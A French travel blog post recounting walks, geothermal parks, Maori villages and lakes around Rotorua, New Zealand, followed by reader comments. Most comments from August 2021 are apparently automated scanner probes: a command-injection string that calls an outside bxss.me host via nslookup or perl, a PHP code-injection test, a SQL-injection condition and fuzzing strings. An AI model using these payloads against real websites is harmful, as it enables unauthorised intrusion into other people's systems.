· 

Rotorua

Ville géothermique, lac et soufre.

 

Rotorua, dont le lac est magnifique, est une ville où l'odeur de soufre est permanente. Il faut dire que les sites thermaux ne manquent pas car l'activité volcanique est intense. Je citerai les plus célèbres comme Waimangu Valley ou Wai-o-tapu que je n'irai pas visiter. Pourquoi ? C'est touristique et un peu trop à mon goût. C'est assez cher (plus de trente dollars pour chaque lieu) et le temps passé sur place n'est pas forcément rentabilisé. En outre, je préfère découvrir des sites moins connus mais tout aussi fabuleux et moins peuplés.

 

La plupart des attractions sont payantes et le prix est assez élevé. J'ai compté que j'aurais dû débourser environ 700 dollars si j'avais voulu tout voir et tout faire (je vous détaillerai par la suite le prix des visites). Mon budget ne me le permet pas. Je n'ai pas parlé de la vie en Nouvelle-Zélande mais elle est assez chère à cause, je pense, du niveau de vie des habitants assez élevé. Je fais des choix purement subjectifs et personnels.

 

Un mot sur la ville : j'ai beaucoup de mal à accrocher. Verdoyante, elle est trop "chargée" en magasin et je la trouve étouffante, l'odeur y est aussi pour quelque chose. Il en est de même pour l'auberge de jeunesse où je séjourne et qui est, à mon sens, peu conviviale. Il s'agit peut-être d'un coup de mou passager mais c'est mon sentiment pour l'instant.

 

 

La marche de Lakefront à Redwoods.

 

J'avais décidé de faire la promenade qui démarre de Lakefront et qui suit une grande partie du pourtour du lac (cf photo ci-contre). Je pensais que ce serait simple avec le lac à ma gauche et que ce serait une journée détente. La balade était simple mais plus originale et inattendue que je ne le croyais. La première demi-heure fut semblable à mon idée première mais mon parcours aller, qui a duré plus de deux heures, s'est considérablement étoffé. Je suis arrivée dans une zone géothermique assez dense où l'odeur de soufre est persistante et forte. Différents panneaux expliquent l'activité, qui se déroule sous terre, et le spectacle permanent auquel j'ai assisté. Des flaques de boue bouillonnante, des vapeurs de soufre qui s'échappent de roches ou de trous dans le sol, des points d'eau verts ou blanc laiteux sont disséminés sur toute la longueur de cette promenade où j'ai croisé quelques personnes et cyclistes, plutôt des habitants et un nombre de touristes inférieur à dix, contrairement aux deux sites payants que j'évoquais plus haut, alors que moi, j'ai vu tout ça gratuitement avec mes jambes toujours partantes. Je vous joins les photos de cet endroit surprenant où la vie ne s'arrête jamais, comme le montrent une végétation luxuriante et une faune (oiseaux, petits insectes) très présente, et c'est très bien ainsi.

 

Cette promenade a été interrompue par une route qu'il suffit de traverser pour recommencer un nouveau chemin qui m'amène à Redwoods, la forêt et ses nombreux treks dont je vous parlerai une prochaine fois. Si je n'en ai pas réalisé un seul aujourd'hui, je compte bien en faire un ou plusieurs. Cette balade m'a fait prendre conscience - et plus encore en écrivant - que l'inattendu se profile à chaque pas et que la fin est le commencement d'autre chose qui débouchera peut-être sur une voie surprenante. Donc à suivre !

 

 

Ngongotaha et Skyline.

 

Cette journée fut assez "sage" et pour la première fois, j'ai pris le bus. J'avais envie de découvrir le village de Ngongotaha pour ses paysages, ses grands monts qui permettent d'avoir une vue sur Rotorua et son lac. Il est joli et m'a permis de faire une marche "surprise" en pleine nature.

J'ai décidé de retourner à Rotorua en parcourant les six kilomètres indiqués. Sur le trajet, j'ai testé la Skyline, téléphérique qui permet l'ascension jusqu'au mont Ngongotaha. J'ai beaucoup hésite à faire cette attraction qui ne fera pas partie de mes préférées. La vue est, certes, jolie, mais le sommet propose maintes activités payantes (luge, VTT…) que je peux faire en France. J'ai, cependant, fait les deux balades proposées qui restent assez quelconques. Une journée assez cool, pas très sportive et pas de grandes découvertes.

Le village thermal maori de Whakarewarewa.

 

J'ai réservé pour 40 dollars cette visite d'un village où vivent réellement des Maoris. Même si c'est touristique (boutiques de souvenirs, j'ai beaucoup apprécié ma journée où j'ai pu admirer des sites géothermiques, un spectacle maori et deux geysers en action.

Le village est habité par une communauté qui utilise les éléments naturels pour cuisiner, se baigner, construire leurs maisons (grâce à la fougère arborescente) ou laver leurs vêtements. Un cimetière, deux églises (catholique et anglicane), un potager et des chemins de marche complètent les lieux d'où l'on peut observer à trois endroits l'activité des geysers, ainsi que le lac vert magnifique (photo ci-dessus).

Je vous présente quelques sites : 

- Photo 1 : le "bassin" où cuisent les aliments comme ici le maïs.

- Photo 2 : "Clapotis meurtriers", la plus grande piscine où sont cuits légumes à feuilles, racines, poissons, etc.

- Photo 3 : Bains communaux où les habitants se baignent sauf entre 8h30 et 17h, horaires d'ouverture du village au public.

- Photo 4 : Source d'eau très chaude (120°C) où j'ai dû retirer mes lunettes pleines de buée à plusieurs reprises.

- Photo 5 : Geysers.

- Photo 6 : Spectacle maori où j'ai pu assister à une démonstration de haka.

 

Il existe d'autres villages plus chers mais ils ont été reconstitués et ne sont donc pas authentiques. J'ai choisi celui-là et je suis ravie de ce que j'ai vu. Une dernière chose : quand vous approchez d'une source chaude, vous sentez déjà la chaleur à un ou deux mètres. Une chute serait mortelle.

 

The Blue Lake or Tikitapu.

 

J'avais décidé d'aller voir The Blue Lake qui se trouve à environ 12 kilomètres de Rotorua. Je les ai parcourus presque en entier. Une dame m'a gentiment pris en voiture pour les deux-trois derniers kilomètres. Très sympa, elle est déjà venue en France à Annecy et Chamonix et a tenté d'apprendre le français qu'elle trouve difficile (surtout les conjugaisons, le masculin et le féminin). Elle m'a donné également des informations sur le lac, les activités et sur le pays.

Le lac me fait penser à celui que j'avais vu avec Francis au Mont-Tremblant en un peu plus petit. J'ai pu en faire le tour qui mesure 5,5 kilomètres. Yes, I did it ! La balade dans la forêt était très agréable et m'a rafraîchie. Aujourd'hui, la température a dépassé les trente degrés.

Après cette promenade, un moment de détente s'est imposé. Assise sur le bord du lac, j'ai profité pendant plus d'une heure de l'environnement, du soleil et des personnes venues se baigner ou faire du bateau. Pour parfaire ce moment, j'ai enfin dégusté la real fruit ice cream qui est un mélange de crème glacée et de fruits mixés. Les saveurs les plus fréquentes sont framboise, fraise, mûre (ce fut mon choix). Un délice ! Il me fallait bien ça pour effectuer le retour.

Là encore, une dame m'a pris en voiture, presque au même endroit que l'autre, et m'a déposée à Redwoods où j'ai soigné mes jambes écorchées par les ronces avant de rentrer fatiguée mais ravie de ma journée, d'avoir été aidée et d'avoir aidé une femme en fauteuil roulant coincée dans le sable.

 

Village maori d'Ohinemutu.

 

Je voulais voir le village maori gratuit et habité d'Ohinemutu qui se trouve à Rotorua. Authentique, il contient un cimetière, des habitations, une église, un lieu de réunion ainsi que de nombreuses zones thermales à forte odeur de soufre et où les dépôts de ce gaz jaune-orangé se mélange à l'eau très chaude voire bouillante.

Vivant, ce village est peu visité par les touristes. C'est ce qui fait son charme, je pense. Des enfants qui font signe, des chiens qui remuent la queue, des villageois qui disent bonjour avec pour cadre le lac de Rotorua, c'est une plongée dans le monde des peuples autochtones qui, authentiques, gardent un lien fort avec la nature.

 

Kuirau Park.

 

Le plus grand parc de la ville est également celui qui contient plusieurs dizaines de zones géothermiques en activité ou non : piscines de boue bouillante, fumée de soufre s'échappant de roches jaunies, étendues d'eau de taille différente... Au départ, très déçue, je pensais qu'il ne contenait que deux zones peu actives mais je n'avais pas vu toutes les possibilités offertes.

Une a plus particulièrement retenu mon attention : le lac Kuirau dont les vapeurs d'eau chaude n'ont cessé d'embuer mes lunettes. Une légende maorie dit qu'une femme maorie aimant se baigner dans ces eaux a été enlevée par un "Taniwha" et qu'elle a disparu définitivement. Les Dieux, en colère, ont fait bouillir le lac et c'est ce qui explique son état actuel. J'aime les histoires donc j'y crois !

Mont Ngongotaha.

 

Je voulais monter là-haut pour admirer la vue sur la ville. J'ai grimpé au sommet par Jubilee Track qui fait un peu plus de deux kilomètres mais je n'ai rien vu. Il est impossible d'accéder au sommet à cause d'une antenne électrique. L'ascension pas facile n'a pas été récompensée par la vue mais par la satisfaction de l'avoir faite. J'ai profité de la forêt et de quelques paysages aperçus. C'est mieux que rien.

Redwoods, les treks.

 

J'ai décidé pour ma dernière journée de profiter de la forêt et de faire deux des quatre treks proposés. Je n'ai pas fait le plus long qui dure 8 heures mais celui (couleur violette) juste en dessous (11,5 km) d'une durée, selon les écriteaux, de 3h30. Parfois un peu difficile dans les montées et descentes abruptes, il est très intéressant et les paysages à voir magnifiques. Le second a été beaucoup plus facile (couleur verte) : 4,8 kilomètres, toujours dans la nature avec des beaux panoramas. Une journée sportive sous un beau soleil marque la fin de mon séjour à Rotorua qui ne reste pas ma ville préférée.

Écrire commentaire

Commentaires: 24
  • #1

    Sam (lundi, 11 février 2019 14:32)

    ça donne envie de dépaysement et de voyager en tous les cas. C'est bien d'avoir de tes nouvelles par ce blog :-) Enjoy !

  • #2

    Lionel Lebeau (lundi, 11 février 2019 14:52)

    Mon cerveau m'a joué un tour. J'ai lu "Ville géométrique" au lieu de "Ville géothermique"...

  • #3

    Lionel Lebeau (jeudi, 14 février 2019 20:29)

    Voila une glace que j'aurais aimé ^^
    Tu as vraiment de la chance lors de tes sorties, te faire prendre en voiture pour un bout de route à l'aller et au retour...
    Et tu trouves même le moyen de faire une B.A. :)

  • #4

    VABxvsyH (lundi, 16 août 2021 14:01)

    20

  • #5

    VABxvsyH (lundi, 16 août 2021 14:14)

    20

  • #6

    VABxvsyH (lundi, 16 août 2021 14:15)

    20

  • #7

    VABxvsyH (lundi, 16 août 2021 14:15)

    `(nslookup hitaigblsqxkw4d8d7.bxss.me||perl -e "gethostbyname('hitaigblsqxkw4d8d7.bxss.me')")`

  • #8

    VABxvsyH (lundi, 16 août 2021 14:15)

    20

  • #9

    VABxvsyH (lundi, 16 août 2021 14:15)

    20

  • #10

    /xfs.bxss.me (lundi, 16 août 2021 14:16)

    20

  • #11

    VABxvsyH (lundi, 16 août 2021 14:16)

    20

  • #12

    VABxvsyH (lundi, 16 août 2021 14:16)

    20

  • #13

    VABxvsyH (lundi, 16 août 2021 14:16)

    20

  • #14

    ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) (lundi, 16 août 2021 14:16)

    20

  • #15

    ';print(md5(31337));$a=' (lundi, 16 août 2021 14:16)

    20

  • #16

    VABxvsyH (lundi, 16 août 2021 14:16)

    20

  • #17

    VABxvsyH (lundi, 16 août 2021 14:16)

    20

  • #18

    -1 OR 2+36-36-1=0+0+0+1 -- (lundi, 16 août 2021 14:17)

    20

  • #19

    VABxvsyH (lundi, 16 août 2021 14:17)

    20

  • #20

    VABxvsyH (lundi, 16 août 2021 14:18)

    20

  • #21

    VABxvsyH (lundi, 16 août 2021 14:18)

    20

  • #22

    VABxvsyH (lundi, 16 août 2021 14:19)

    20

  • #23

    VABxvsyH (lundi, 16 août 2021 14:19)

    20

  • #24

    VABxvsyH (lundi, 16 août 2021 18:38)

    20